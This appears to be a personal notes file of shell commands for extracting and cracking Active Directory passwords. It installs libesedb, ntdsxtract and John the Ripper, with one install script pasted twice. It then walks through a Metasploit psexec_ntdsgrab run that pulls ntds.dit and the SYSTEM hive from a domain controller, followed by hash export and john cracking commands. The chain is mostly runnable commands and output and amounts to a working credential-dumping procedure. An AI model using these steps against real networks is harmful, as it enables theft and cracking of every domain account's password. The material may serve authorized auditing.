UNSORTED/SECURITY/NOT FINISHED - ad password extractor
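#!/bin/bash
# Active Directory passwords — tooling setup: libesedb, ntdsxtract, john rules.
# Abort on the first failed command so a broken download or build is not silently used.
set -euo pipefail

# build dependencies first: the libesedb build needs them, so install before unpacking
apt install -y make gcc git build-essential libssl-dev

#libesedb
wget https://github.com/libyal/libesedb/releases/download/20170121/libesedb-experimental-20170121.tar.gz
tar xvzf libesedb-experimental-20170121.tar.gz
# the "experimental" tarball unpacks to a directory without that word in its name
cd libesedb-20170121/
# TODO: build here (./configure && make) — unpacking alone does not produce esedbtools/esedbexport, which the later steps use

#ntdsextract
# NOTE: cloned relative to the current directory (inside the libesedb tree); later notes reference /usr/local/src/ntdsxtract — confirm the path
git clone https://github.com/csababarta/ntdsxtract.git

#john(as root)
# wget saves the file under the URL's basename and prints nothing on stdout, so a bare `>>`
# appended an empty stream; `-O -` streams the rules to stdout so they actually land in john.conf.
# The rules come over plain HTTP with no checksum — review the appended text before relying on it.
wget -O - http://openwall.info/wiki/_media/john/korelogic-rules-20100801-reworked-all-3k.txt >> /etc/john/john.conf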
https://gist.github.com/kerberis/36e948a7d04702ec361d
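#!/bin/bash
# Centos 7 John the Ripper Installation
# Abort on any failure so a failed signature check halts the build instead of being ignored.
set -euo pipefail
yum -y install wget gpgme
yum -y group install "Development Tools"
cd
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz.sign
wget http://www.openwall.com/signatures/openwall-signatures.asc
gpg --import openwall-signatures.asc
# --verify only checks the signature against the imported key; it does not establish that the key
# is the right one. Compare the imported key's fingerprint with a trusted source before building.
# gpg exits non-zero on a bad signature, which under set -e stops the script here.
gpg --verify john-1.8.0.tar.xz.sign john-1.8.0.tar.xz
# the archive is .tar.xz: J selects xz, j (bzip2) fails on it
tar xvfJ john-1.8.0.tar.xz
cd john-1.8.0/src
make clean linux-x86-64
cd ../run/
./john --test
#password dictionary download
wget -O - http://mirrors.kernel.org/openwall/wordlists/all.gz | gunzip -c > openwall.dico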
Added by me
/etc/john/john.conf
sudo msfconsole
msf > use auxiliary/admin/smb/psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show options
set RHOST <DC_CTRL_IP>
msf auxiliary(psexec_ntdsgrab) > set SMBDomain <DOMAIN_NAME>
msf auxiliary(psexec_ntdsgrab) > set SMBPass ########
msf auxiliary(psexec_ntdsgrab) > set SMBUser Administrateur
run (twice)
(remember the path of the downloaded files)
ntds.dit stored at /root/.msf4/loot/20210311084120_default_<DC_CTRL_IP>_psexec.ntdsgrab._773375.dit
SYSTEM hive stored at /root/.msf4/loot/20210311084131_default_<DC_CTRL_IP>_psexec.ntdsgrab._817994.bin
<USER>@laptop:/usr/local/src/libesedb-20210121/esedbtools$ ./esedbexport -t ~/ntds /root/.msf4/loot/20210311084120_default_<DC_CTRL_IP>_psexec.ntdsgrab._773375.dit
cd ~/ntds.export/
<USER>@laptop:~/ntds.export$ python /usr/local/src/ntdsxtract/dsusers.py datatable.3 link_table.5 extract/ --lmoutfile LM.out --ntoutfile NT.out --passwordhashes --pwdformat john --syshive /root/.msf4/loot/20210311084131_default_<DC_CTRL_IP>_psexec.ntdsgrab._817994.bin
# show the extracted NT hashes, then run john over them with all rules
cat -- extract/NT.out
# --fork should match the number of CPUs you have
sudo john --fork=4 --rules=all extract/NT.out
CURRENT USAGE (11/2021)
[root@] run # ./john --format=nt --fork=7 /root/ntlm-extract.ntds
https://gist.github.com/kerberis/36e948a7d04702ec361d
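#!/bin/bash
# Centos 7 John the Ripper Installation
# Abort on any failure so a failed signature check halts the build instead of being ignored.
set -euo pipefail
yum -y install wget gpgme
yum -y group install "Development Tools"
cd
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz
wget http://www.openwall.com/john/j/john-1.8.0.tar.xz.sign
wget http://www.openwall.com/signatures/openwall-signatures.asc
gpg --import openwall-signatures.asc
# --verify only checks the signature against the imported key; it does not establish that the key
# is the right one. Compare the imported key's fingerprint with a trusted source before building.
# gpg exits non-zero on a bad signature, which under set -e stops the script here.
gpg --verify john-1.8.0.tar.xz.sign john-1.8.0.tar.xz
# J = xz decompression, matching the .tar.xz archive
tar xvfJ john-1.8.0.tar.xz
cd john-1.8.0/src
make clean linux-x86-64
cd ../run/
./john --test
#password dictionary download
wget -O - http://mirrors.kernel.org/openwall/wordlists/all.gz | gunzip -c > openwall.dico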
This will place us in ~/john-1.8.0/run
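# wget saves the file under the URL's basename and prints nothing on stdout, so a bare `>>`
# appended an empty stream to john.conf; `-O -` streams the rules to stdout so they are appended.
# Plain HTTP, no checksum — review the appended rules before relying on them.
wget -O - http://openwall.info/wiki/_media/john/korelogic-rules-20100801-reworked-all-3k.txt >> john.conf
# -p so re-running these notes does not fail on an existing directory
mkdir -p work-dir
# Put the NT.out file here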
https://adamdoupe.com/publications/black-box-scanners-dimva2010.pdf
https://www.aldeid.com/wiki/WackoPicko
https://securityinabox.org
https://bkimminich.gitbooks.io/pwning-owasp-juice-shop/content/introduction/architecture.html